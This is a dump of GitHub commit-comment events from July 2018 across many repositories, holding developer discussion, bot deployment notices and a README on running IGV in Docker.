{"id":"7979258989","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":29740829,"position":null,"line":null,"path":null,"commit_id":"982db164af4fdf568642c380daff9ac4c97ca2f1","created_at":"2018-07-17T21:04:12Z","updated_at":"2018-07-17T21:04:12Z","author_association":"OWNER","body":"@rachmadaniHaryono please check the lint check failures."}},"created_at":"2018-07-17T21:04:12Z"}
{"id":"7979260085","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29740831,"position":null,"line":null,"path":null,"commit_id":"72604674d71d5fcbda291abdb6a56ee31ad18622","created_at":"2018-07-17T21:04:25Z","updated_at":"2018-07-17T21:04:25Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-50](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-50-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T21:04:25Z"}
{"id":"7979264435","type":"CommitCommentEvent","actor":{"login":"jsgro"},"repo":{"name":"jsgro/Docker_IGV"},"payload":{"comment":{"id":29740841,"position":null,"line":null,"path":null,"commit_id":"cd7c409a94c3fddca49fa1d3c3ba5ce5d2d1358e","created_at":"2018-07-17T21:05:19Z","updated_at":"2018-07-17T21:05:19Z","author_association":"OWNER","body":"# PURPOSE\r\n\r\nRun `IGV` in a container. This came about when a Mac had Java 10 but IGV requires Java 8.\r\n\r\nIGV: Integrative Genomics Viewer - Broad Institute\r\n[https://software.broadinstitute.org/software/igv/](https://software.broadinstitute.org/software/igv/)\r\n\r\nIGV version installed: `2.4.11`\r\n\r\nUbutu base used: `ubuntu:18.04`\r\n\r\n# HOW TO RUN\r\n\r\nDisplaying the graphics from IGV requires `X11`, read below for Mac.   \r\nWindows users *might* be able to replace `XQuartz` with `MobaXterm` (not tested) or another `X` software.\r\n\r\nIGV will run in the Unix graphical environment `X11`. Below is a method I found online to accomplish this.\r\nSee **How to show X11 windows with Docker on Mac** by *Marc Reichelt* [https://bit.ly/2usa0bB](https://bit.ly/2usa0bB)\r\n\r\n## Set-up:\r\n\r\n* Install the latest XQuartz X11 server and run it\r\n* Activate the option ‘Allow connections from network clients’ in XQuartz settings (menu: `Xquartz > Preferences...` and click on `Security` tab.)\r\n* Crucial: Quit & restart XQuartz (to activate the setting)\r\n\r\nOpen a *Terminal* and run command: `xhost + 127.0.0.1` or create and run the following script:\r\n\r\n```\r\n#!/bin/bash\r\n\r\n# allow access from localhost\r\nxhost + 127.0.0.1\r\n```\r\n\r\n## Create Docker container and run IGV\r\n\r\nTo add shared volume add `-v` as shown below for a (blank) directory here called `dockershare` mapped onto the `/root` home directory on the container\r\n\r\n```\r\ndocker run -it --rm -v /Users/$USER/dockershare:/root -e DISPLAY=docker.for.mac.localhost:0 jysgro/igv:igv:2.4.11 /bin/sh\r\n```\r\n\r\nThis command will create the container with a shell. To start IGV simply issue the command: `igv &` and when done type `exit` to exit the container. \r\n\r\nThank you to *Marc Reichelt* (link above) for the very informative blog that makes this easy. Here is the important remark from his blog:\r\n\r\n*Notice the trick using docker.for.mac.localhost as display name. That’s a hostname that points to the host machine, so we don’t have to deal with changing IP addresses.*\r\n\r\nIndeed when I check inside the container:\r\n\r\n```\r\n# printenv DISPLAY\r\ndocker.for.mac.localhost:0\r\n# \r\n```\r\n\r\n"}},"created_at":"2018-07-17T21:05:19Z"}
{"id":"7979265335","type":"CommitCommentEvent","actor":{"login":"nloppi"},"repo":{"name":"vincentlab/PyFR"},"payload":{"comment":{"id":29740842,"position":4,"line":7,"path":"pyfr/solvers/aceuler/elements.py","commit_id":"1501f3ed254317555f7363efeabb3365820d51ff","created_at":"2018-07-17T21:05:30Z","updated_at":"2018-07-17T21:05:30Z","author_association":"NONE","body":"We want to keep the formulation class variable under Dual and Std integrators because some plugins such as pseudostats may only work with 'dual' but it works with both ac and regular systems. The formulations variables specified under elements are unnecessary because the only combination that does not work is std + ac-system, which is now taken care of with the modified sanity check in BaseStdIntegrator.\r\n\r\n+        if systemcls.name.startswith('ac'):\r\n             raise RuntimeError(\r\n                 'System {0} does not support time stepping formulation {1}'\r\n                 .format(systemcls.name, self.formulation)"}},"created_at":"2018-07-17T21:05:30Z"}
{"id":"7979267859","type":"CommitCommentEvent","actor":{"login":"clairechoo"},"repo":{"name":"knturi/sisbid_keithb"},"payload":{"comment":{"id":29740847,"position":null,"line":null,"path":null,"commit_id":"a7263542b1a99e671d2523d430035f45c3b79221","created_at":"2018-07-17T21:06:00Z","updated_at":"2018-07-17T21:06:00Z","author_association":"NONE","body":"i have added new stuff"}},"created_at":"2018-07-17T21:06:00Z"}
{"id":"7979272254","type":"CommitCommentEvent","actor":{"login":"rulai-hu"},"repo":{"name":"rulai-hu/simple-renderer"},"payload":{"comment":{"id":29740856,"position":null,"line":null,"path":null,"commit_id":"7545ef465738580d6b8c365cbf69013f685b997a","created_at":"2018-07-17T21:06:55Z","updated_at":"2018-07-17T21:06:55Z","author_association":"OWNER","body":"I broke depthCueing"}},"created_at":"2018-07-17T21:06:55Z"}
{"id":"7979272918","type":"CommitCommentEvent","actor":{"login":"Quelklef"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29740859,"position":null,"line":null,"path":null,"commit_id":"f2b6efb7dcffd0a41543ee755329aa5748887b42","created_at":"2018-07-17T21:07:03Z","updated_at":"2018-07-17T21:07:03Z","author_association":"CONTRIBUTOR","body":"Huh, I just tried it and `isAbsolute` looks fine, and exactly as expected, for me. Can I ask what browser you're using? Also, is this screenshot from after clicking the `...`, or did no `...` appear? Are there any Javascript errors?"}},"created_at":"2018-07-17T21:07:03Z"}
{"id":"7979273607","type":"CommitCommentEvent","actor":{"login":"FreddieWitherden"},"repo":{"name":"vincentlab/PyFR"},"payload":{"comment":{"id":29740860,"position":4,"line":7,"path":"pyfr/solvers/aceuler/elements.py","commit_id":"1501f3ed254317555f7363efeabb3365820d51ff","created_at":"2018-07-17T21:07:12Z","updated_at":"2018-07-17T21:07:12Z","author_association":"MEMBER","body":"So I think that we should keep this generic in case people want to write their own systems which rely on the specifics of the time stepping scheme."}},"created_at":"2018-07-17T21:07:12Z"}
{"id":"7979280752","type":"CommitCommentEvent","actor":{"login":"fritzk"},"repo":{"name":"fritzk/OpenGL-Registry"},"payload":{"comment":{"id":29740872,"position":39,"line":39,"path":"extensions/MESA/MESA_framebuffer_flip_y.txt","commit_id":"f3eb6fbc96ac6d2ecff734bbb88bafdda1051322","created_at":"2018-07-17T21:08:41Z","updated_at":"2018-07-17T21:08:41Z","author_association":"OWNER","body":"fair enough.  It make sense to me when I wrote it 3 weeks ago.  but you're right, reading it now it is confusing."}},"created_at":"2018-07-17T21:08:41Z"}
{"id":"7979281011","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29740873,"position":null,"line":null,"path":null,"commit_id":"8edb84b5fcc063729f910ec5915e3202a8e881e6","created_at":"2018-07-17T21:08:44Z","updated_at":"2018-07-17T21:08:44Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-48](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-48).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-48-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T21:08:44Z"}
{"id":"7979282446","type":"CommitCommentEvent","actor":{"login":"Quelklef"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29740878,"position":null,"line":null,"path":null,"commit_id":"f2b6efb7dcffd0a41543ee755329aa5748887b42","created_at":"2018-07-17T21:09:03Z","updated_at":"2018-07-17T21:09:03Z","author_association":"CONTRIBUTOR","body":"Also, if you're on Windows, I may know the issue. Try this:\r\n\r\nIn `compiler/docgen.nim`, replace all instances of `.replace(\"\\n\", \"\")` with `.replace(\"\\p\", \"\")`. Recompile and rebuild the documentation and tell me if that fixes it."}},"created_at":"2018-07-17T21:09:03Z"}
{"id":"7979283197","type":"CommitCommentEvent","actor":{"login":"s-zanella"},"repo":{"name":"project-everest/hacl-star"},"payload":{"comment":{"id":29740879,"position":null,"line":null,"path":null,"commit_id":"79de0e9a9a0da076275d041e8b8800e1b69f756f","created_at":"2018-07-17T21:09:13Z","updated_at":"2018-07-17T21:09:13Z","author_association":"CONTRIBUTOR","body":"The alternative is replicating a chunk of the F* standard library on top of `Lib.Sequence.fsti` (at least a big chunk of `FStar.Seq`,  `LowStar.Buffer`, `LowStar.Modifies`, `LowStar.ModifiesPat`). See the `pqcrypto_lib` for an incomplete attempt at doing it.\r\nMost (all?) modules currently using `Lib.Sequence.fsti` use `--expose_interfaces Lib.Sequence.fst` anyway, so the abstraction is an illusion."}},"created_at":"2018-07-17T21:09:13Z"}
{"id":"7979283273","type":"CommitCommentEvent","actor":{"login":"fritzk"},"repo":{"name":"fritzk/OpenGL-Registry"},"payload":{"comment":{"id":29740881,"position":79,"line":79,"path":"extensions/MESA/MESA_framebuffer_flip_y.txt","commit_id":"f3eb6fbc96ac6d2ecff734bbb88bafdda1051322","created_at":"2018-07-17T21:09:14Z","updated_at":"2018-07-17T21:09:14Z","author_association":"OWNER","body":"done."}},"created_at":"2018-07-17T21:09:14Z"}
{"id":"7979285563","type":"CommitCommentEvent","actor":{"login":"QmarXX"},"repo":{"name":"polylang/polylang"},"payload":{"comment":{"id":29740885,"position":null,"line":null,"path":null,"commit_id":"b644ef78be156f862e8999ead23cf21719662e6c","created_at":"2018-07-17T21:09:45Z","updated_at":"2018-07-17T21:09:45Z","author_association":"NONE","body":"On wordpress.org you write that plugin required WP > 4.4 so this fix causes error on older WP installations in admin panel and display white page so user can't even disable plugin. Please add check before uses `get_user_locale()` function or change description on WP plugin page."}},"created_at":"2018-07-17T21:09:45Z"}
{"id":"7979291854","type":"CommitCommentEvent","actor":{"login":"joncinque"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29740891,"position":5,"line":285,"path":"js/gemini.js","commit_id":"f2e55490cfc36e53ce3c1ae22c584cdbe63fb270","created_at":"2018-07-17T21:11:04Z","updated_at":"2018-07-17T21:11:04Z","author_association":"CONTRIBUTOR","body":"You don't need to call this here because it's already done in `parseOrders` see https://github.com/ccxt/ccxt/blob/master/js/base/Exchange.js#L1005"}},"created_at":"2018-07-17T21:11:04Z"}
{"id":"7979300195","type":"CommitCommentEvent","actor":{"login":"luisravila"},"repo":{"name":"luisravila/avengers"},"payload":{"comment":{"id":29740903,"position":null,"line":null,"path":null,"commit_id":"156604ae3ab9e84590e0aeb4ad8ce0f5c600a8a6","created_at":"2018-07-17T21:12:50Z","updated_at":"2018-07-17T21:12:50Z","author_association":"OWNER","body":"Aquí creamos la mision red skull #7 "}},"created_at":"2018-07-17T21:12:50Z"}
{"id":"7979304450","type":"CommitCommentEvent","actor":{"login":"BryanSWeber"},"repo":{"name":"BryanSWeber/CUNYAIModule"},"payload":{"comment":{"id":29740912,"position":null,"line":null,"path":null,"commit_id":"b31bfcc4fcc5ed6f563cfd5fe09e6ed613fcf0c9","created_at":"2018-07-17T21:13:45Z","updated_at":"2018-07-17T21:13:45Z","author_association":"OWNER","body":"The change to unit_inventory is a mistake."}},"created_at":"2018-07-17T21:13:45Z"}
{"id":"7979305775","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29740914,"position":null,"line":null,"path":null,"commit_id":"6ff24def958ab9d3c5035543693bf22cd2390eaa","created_at":"2018-07-17T21:14:02Z","updated_at":"2018-07-17T21:14:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add a way to create notes](https://trello.com/c/fx9EYEfh/6-add-a-way-to-create-notes)"}},"created_at":"2018-07-17T21:14:02Z"}
{"id":"7979305809","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29740915,"position":null,"line":null,"path":null,"commit_id":"e52ded78e97a4bd341bbce4d9a2084a15fc56515","created_at":"2018-07-17T21:14:02Z","updated_at":"2018-07-17T21:14:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add a way to create notes](https://trello.com/c/fx9EYEfh/6-add-a-way-to-create-notes)"}},"created_at":"2018-07-17T21:14:02Z"}
{"id":"7979305865","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29740916,"position":null,"line":null,"path":null,"commit_id":"7dfc785dd5b2dcbe0d353dc1d785a7e42ffc7ea5","created_at":"2018-07-17T21:14:03Z","updated_at":"2018-07-17T21:14:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add a way to create notes](https://trello.com/c/fx9EYEfh/6-add-a-way-to-create-notes)"}},"created_at":"2018-07-17T21:14:03Z"}
{"id":"7979308742","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29740921,"position":null,"line":null,"path":null,"commit_id":"e3f641f1c978b2f5c749ff4b856844b367bf0569","created_at":"2018-07-17T21:14:38Z","updated_at":"2018-07-17T21:14:38Z","author_association":"COLLABORATOR","body":"I removed it. That is a wrong file."}},"created_at":"2018-07-17T21:14:38Z"}
{"id":"7979314601","type":"CommitCommentEvent","actor":{"login":"kroitor"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29740940,"position":5,"line":285,"path":"js/gemini.js","commit_id":"f2e55490cfc36e53ce3c1ae22c584cdbe63fb270","created_at":"2018-07-17T21:15:55Z","updated_at":"2018-07-17T21:15:55Z","author_association":"MEMBER","body":"Yep, thx for pointing that out, I overlooked it."}},"created_at":"2018-07-17T21:15:55Z"}
{"id":"7979316062","type":"CommitCommentEvent","actor":{"login":"jin"},"repo":{"name":"bazelbuild/bazel"},"payload":{"comment":{"id":29740948,"position":null,"line":null,"path":null,"commit_id":"86e007fdeced120cda3108e97044db4fd817d5f0","created_at":"2018-07-17T21:16:14Z","updated_at":"2018-07-17T21:16:14Z","author_association":"MEMBER","body":"Hmm, aren't the anchor links automatically generated? https://docs.bazel.build/versions/master/external.html#supported-types-of-external-dependencies"}},"created_at":"2018-07-17T21:16:14Z"}
{"id":"7979320651","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29740956,"position":null,"line":null,"path":null,"commit_id":"22b796557afd94d3c2b9efe638b29619b82dd9e4","created_at":"2018-07-17T21:17:15Z","updated_at":"2018-07-17T21:17:15Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-224](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-224).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-224-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-17T21:17:15Z"}
{"id":"7979321090","type":"CommitCommentEvent","actor":{"login":"joncinque"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29740957,"position":5,"line":285,"path":"js/gemini.js","commit_id":"f2e55490cfc36e53ce3c1ae22c584cdbe63fb270","created_at":"2018-07-17T21:17:21Z","updated_at":"2018-07-17T21:17:21Z","author_association":"CONTRIBUTOR","body":"No problem, I had just spent a long time looking at it 😄 "}},"created_at":"2018-07-17T21:17:21Z"}
{"id":"7979323170","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29740960,"position":79,"line":61,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T21:17:46Z","updated_at":"2018-07-17T21:17:46Z","author_association":"OWNER","body":"The web application that runs on top the EVM will handle that by using the appropiate web3 method."}},"created_at":"2018-07-17T21:17:46Z"}
{"id":"7979324190","type":"CommitCommentEvent","actor":{"login":"akyjd"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29740962,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T21:17:59Z","updated_at":"2018-07-17T21:17:59Z","author_association":"NONE","body":"Where did you save your python script?\r\nMaybe you need to change directory.\r\nWhen you open your command prompt, what you see there? Is it your script in that location? If isn't, just write script location,for example > cd C:\\Documents and Settings\\yourPSuserame\\Desktop\\pyscripts and when you change it, you can run calc.py"}},"created_at":"2018-07-17T21:17:59Z"}
{"id":"7979325120","type":"CommitCommentEvent","actor":{"login":"myidsan"},"repo":{"name":"PerfDevTeam/perf_back"},"payload":{"comment":{"id":29740964,"position":null,"line":null,"path":null,"commit_id":"85ce371ded72e13836e604416145ecc1d1292369","created_at":"2018-07-17T21:18:11Z","updated_at":"2018-07-17T21:18:11Z","author_association":"COLLABORATOR","body":"good "}},"created_at":"2018-07-17T21:18:11Z"}
{"id":"7979326680","type":"CommitCommentEvent","actor":{"login":"vgavro"},"repo":{"name":"dukegh/kyivstar"},"payload":{"comment":{"id":29740967,"position":null,"line":null,"path":null,"commit_id":"1c7747ba2dd742a72c41aa95527685ace5b75de3","created_at":"2018-07-17T21:18:31Z","updated_at":"2018-07-17T21:18:31Z","author_association":"NONE","body":"смотрю на логику авторизации и охереваю зачем они так все сложно сделали. наверное тебе сильно это было надо)))"}},"created_at":"2018-07-17T21:18:31Z"}
{"id":"7979332496","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29740980,"position":5,"line":8,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T21:19:49Z","updated_at":"2018-07-17T21:19:49Z","author_association":"OWNER","body":"I am thinking including the address of the exchange in the payee password ?"}},"created_at":"2018-07-17T21:19:49Z"}
{"id":"7979333650","type":"CommitCommentEvent","actor":{"login":"Wyqer"},"repo":{"name":"KillahPotatoes/KP-Ranks"},"payload":{"comment":{"id":29740987,"position":null,"line":null,"path":null,"commit_id":"d5f72370b1fded81a6d1370d9d496a80725df35c","created_at":"2018-07-17T21:20:05Z","updated_at":"2018-07-17T21:20:05Z","author_association":"MEMBER","body":"Preview of the design\r\n![uniformdialog](https://user-images.githubusercontent.com/3811977/42846008-e989236a-8a17-11e8-8c7b-a9fede081b97.png)\r\n"}},"created_at":"2018-07-17T21:20:05Z"}
{"id":"7979345895","type":"CommitCommentEvent","actor":{"login":"riannucci"},"repo":{"name":"chromedp/chromedp"},"payload":{"comment":{"id":29741008,"position":26,"line":26,"path":"runner/path_windows.go","commit_id":"622c90c82cac39a3f2be4376f4ea298c8d651df4","created_at":"2018-07-17T21:22:49Z","updated_at":"2018-07-17T21:22:49Z","author_association":"NONE","body":"This is the cause of #216 "}},"created_at":"2018-07-17T21:22:49Z"}
{"id":"7979347956","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29741013,"position":null,"line":null,"path":null,"commit_id":"504a16d3f5b729a4da52e13fcc92a5f92c0d1f26","created_at":"2018-07-17T21:23:16Z","updated_at":"2018-07-17T21:23:16Z","author_association":"COLLABORATOR","body":"Sorry, I didn't see these comments on time.\r\n`FUSynonym, FUShift, FUScale` are the same thing as the old ones `USynonym, UShift, UScale`, just they are only used for fundamental units. But old ones only used for Derived units. After rethinking about `UDefn`, the initial design of this structure may just for the different display of symbol but not differentiating the kind of the symbol. I may think another way to differentiating the kind of the symbol. @JacquesCarette "}},"created_at":"2018-07-17T21:23:16Z"}
{"id":"7979350468","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29741020,"position":null,"line":null,"path":null,"commit_id":"a4c4cb9f6b5f6168c409c9dbe9075a2526d5dd49","created_at":"2018-07-17T21:23:51Z","updated_at":"2018-07-17T21:23:51Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-500](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-500).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-500-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-17T21:23:51Z"}
{"id":"7979350672","type":"CommitCommentEvent","actor":{"login":"dalviik"},"repo":{"name":"taylorwebk/taylorwebk.github.io"},"payload":{"comment":{"id":29741021,"position":null,"line":null,"path":null,"commit_id":"bdba66bbdf07e51fd367149be32457c8204c582e","created_at":"2018-07-17T21:23:53Z","updated_at":"2018-07-17T21:23:53Z","author_association":"NONE","body":"Jshsvsks"}},"created_at":"2018-07-17T21:23:53Z"}
{"id":"7979351493","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29741024,"position":null,"line":null,"path":null,"commit_id":"029a9fe1dabc782750cb7a695b18018b4ed303bc","created_at":"2018-07-17T21:24:04Z","updated_at":"2018-07-17T21:24:04Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circletestm](https://circletestm-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/support](https://circletestm-static-docs.pantheonsite.io/docs/support)\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/f559572bcad277ecb0a18367c590bfd757b3b435/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/f559572bcad277ecb0a18367c590bfd757b3b435/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-17T21:24:04Z"}
{"id":"7979356861","type":"CommitCommentEvent","actor":{"login":"TD-er"},"repo":{"name":"letscontrolit/ESPEasy"},"payload":{"comment":{"id":29741043,"position":null,"line":null,"path":null,"commit_id":"787c1c6c39d42baf7bdfc44415b0a3b4d02e31bd","created_at":"2018-07-17T21:25:17Z","updated_at":"2018-07-17T21:25:17Z","author_association":"CONTRIBUTOR","body":"@MarceloProjetos \r\nIt is already merged, so using it is just a matter of flashing the last build.\r\n\r\nWhat I changed is the following:\r\n\r\nThere is now a single queue to schedule the things to run.\r\nIn the future I want to have a second instance of this queue on the 2nd core of the ESP32.\r\n\r\nThis queue is a list containing some ID describing what has to be done and a timestamp when it should be scheduled.\r\nThis list is sorted by the scheduled timestamp with the first task at the front of the list.\r\nThe scheduler just looks at this first item and when its timeout has been reached, it will start processing.\r\n\r\nAt this moment only periodical tasks are scheduled like MQTT-processing, 50/sec run, 10/sec, 1/sec etc.\r\nAs soon as these jobs are picked from the list to be handled, they are scheduled again with their normal interval time added to the previous set time.\r\n\r\nFor example:\r\nJob 1/sec is scheduled at `millis() == 12000`\r\nThen the next 1/sec job is scheduled at 12000 + 1000 = 13000. And not at `millis() + 1000`\r\nThis means the jobs will be run at a very constant pace, with only a little jitter in timing due to other processes.\r\n\r\nWhat this fixes is the problem that 1 loop could handle 50/sec, 10/sec. 1/sec and 30sec task, which may take way more than 20 msec (or multiple of 20 msec) and thus delaying the next 50/sec job for a while.\r\nThis means two 50/sec job could have a few-100 msec in between instead of 20 msec.\r\nUsing this scheduler, the most time-critical jobs will get enough attention.\r\nThis affects performance of reading serial data, sampling buttons, counting pulses, etc.\r\n\r\nThis is also needed as preparation for a lot of upcoming changes for a lot of plugins and controllers.\r\nI want to do things as asynchronous as possible, since that's the only way we can appear to be doing multitasking.\r\nThis means there must be some time-critical job for collecting sensor-data, maybe one byte per run.\r\nAnd when that's ready, the parsing of the data can be done in the next loop and preparing data to be sent to a controller in the next, etc.\r\nEach \"task\" or \"plugin\" should be divided in a stream of simple short tasks which can be dealt with in short loop runs.\r\nThat's the only way to keep tasks working on the same node.\r\n\r\nAs an extra bonus, we now can count the loops in which nothing has to be done and thus we now know the idle time and thus a proper CPU-load can be computed.\r\nSo instead of guestimating the maximum loop count and recording the last loop count (over 30 seconds), it is now really possible to say something useful about the CPU load.\r\nStill the CPU is doing a lot (computing the time passed and deciding it is not ready yet), only this time it gives some indication of how much extra work can be done."}},"created_at":"2018-07-17T21:25:17Z"}
{"id":"7979357045","type":"CommitCommentEvent","actor":{"login":"L3vi47h4N"},"repo":{"name":"L3vi47h4N/Viper4Linux"},"payload":{"comment":{"id":29741044,"position":null,"line":null,"path":null,"commit_id":"0719e21a8c8bab30377bbc82fe213e1ec0cfd657","created_at":"2018-07-17T21:25:19Z","updated_at":"2018-07-17T21:25:19Z","author_association":"OWNER","body":"@eu-vinnom\r\n\r\nGlad to know it is working for you. I'll go ahead and make that change. Thanks for the feedback! "}},"created_at":"2018-07-17T21:25:19Z"}
{"id":"7979374397","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29741071,"position":75,"line":76,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T21:29:10Z","updated_at":"2018-07-17T21:29:10Z","author_association":"OWNER","body":"ok, I have included the condition in the contract. However, how can I simulate that I am in the future ?\r\n"}},"created_at":"2018-07-17T21:29:10Z"}
{"id":"7979375384","type":"CommitCommentEvent","actor":{"login":"beurdouche"},"repo":{"name":"project-everest/hacl-star"},"payload":{"comment":{"id":29741073,"position":null,"line":null,"path":null,"commit_id":"79de0e9a9a0da076275d041e8b8800e1b69f756f","created_at":"2018-07-17T21:29:22Z","updated_at":"2018-07-17T21:29:22Z","author_association":"MEMBER","body":"Hmm, there are no use of `--expose_interfaces` for verification, just for extraction..."}},"created_at":"2018-07-17T21:29:22Z"}
{"id":"7979376445","type":"CommitCommentEvent","actor":{"login":"BryanSWeber"},"repo":{"name":"BryanSWeber/CUNYAIModule"},"payload":{"comment":{"id":29741076,"position":4,"line":80,"path":"Unit_Inventory.cpp","commit_id":"d6e42adda95f25c60e45a877a80cc22b2d7031e6","created_at":"2018-07-17T21:29:37Z","updated_at":"2018-07-17T21:29:37Z","author_association":"OWNER","body":"This is likely too frequent to reset the area around the unit which is arguably not surrounded. Still, this is a good start till I implement a better tracking procedure."}},"created_at":"2018-07-17T21:29:37Z"}
{"id":"7979377833","type":"CommitCommentEvent","actor":{"login":"sutapa9000"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29741079,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T21:29:55Z","updated_at":"2018-07-17T21:29:55Z","author_association":"NONE","body":"@melissamas The contents of your python file is correct.Also the colour changes you mentioned are also ok.If you save the file as calc.py..It should be saved as a python file indeed.\r\nIn python 3.7 we can execute python by typing python calc.py or py calc.py.\r\nFrom  the described problem I think your PATH variable is not set properly.\r\nCan you follow the follwoing youtube video as here it is shown visually how to solve the issue.\r\nhttps://www.youtube.com/watch?v=uXqTw5eO0Mw\r\n\r\nIf it still does'nt work, please restart your system as sometimes the environmental variables take a restart to get updated.\r\nHope it solves your issue.If not we will again look into the next error.\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-17T21:29:55Z"}
{"id":"7979380001","type":"CommitCommentEvent","actor":{"login":"kmruddy"},"repo":{"name":"vmware/vsphere-automation-sdk-rest"},"payload":{"comment":{"id":29741088,"position":null,"line":null,"path":null,"commit_id":"9ecd8922bacc51266563eab9e207b1b64494e667","created_at":"2018-07-17T21:30:22Z","updated_at":"2018-07-17T21:30:22Z","author_association":"NONE","body":"Signed-off-by: Kyle Ruddy kruddy@vmware.com"}},"created_at":"2018-07-17T21:30:22Z"}
{"id":"7979380359","type":"CommitCommentEvent","actor":{"login":"Vangelis66"},"repo":{"name":"Ascoware/get-iplayer-automator"},"payload":{"comment":{"id":29741092,"position":null,"line":null,"path":null,"commit_id":"f3c799f799aa2867532a9ecf12a34df0cb64a291","created_at":"2018-07-17T21:30:26Z","updated_at":"2018-07-17T21:30:26Z","author_association":"NONE","body":"Please follow this over at #194; it appears to be the same issue...\r\n\r\n@ManolisGledsodakis wrote: \r\n\r\n> where should I report issues?\r\n\r\nΓειά σου πατρίδα :smile: \r\nI think the proper place is the repository's [issue tracker](https://github.com/Ascoware/get-iplayer-automator/issues) :wink: \r\nBe sure to first read [Reporting Issues](https://github.com/Ascoware/get-iplayer-automator/wiki/Reporting-Issues#how-to-report-bugs)\r\n\r\nCheers"}},"created_at":"2018-07-17T21:30:26Z"}
{"id":"7979381198","type":"CommitCommentEvent","actor":{"login":"kmruddy"},"repo":{"name":"vmware/vsphere-automation-sdk-rest"},"payload":{"comment":{"id":29741095,"position":null,"line":null,"path":null,"commit_id":"50fc8270be428e300c750de320ff983e1556c3c8","created_at":"2018-07-17T21:30:36Z","updated_at":"2018-07-17T21:30:36Z","author_association":"NONE","body":"Signed-off-by: Kyle Ruddy kruddy@vmware.com"}},"created_at":"2018-07-17T21:30:36Z"}
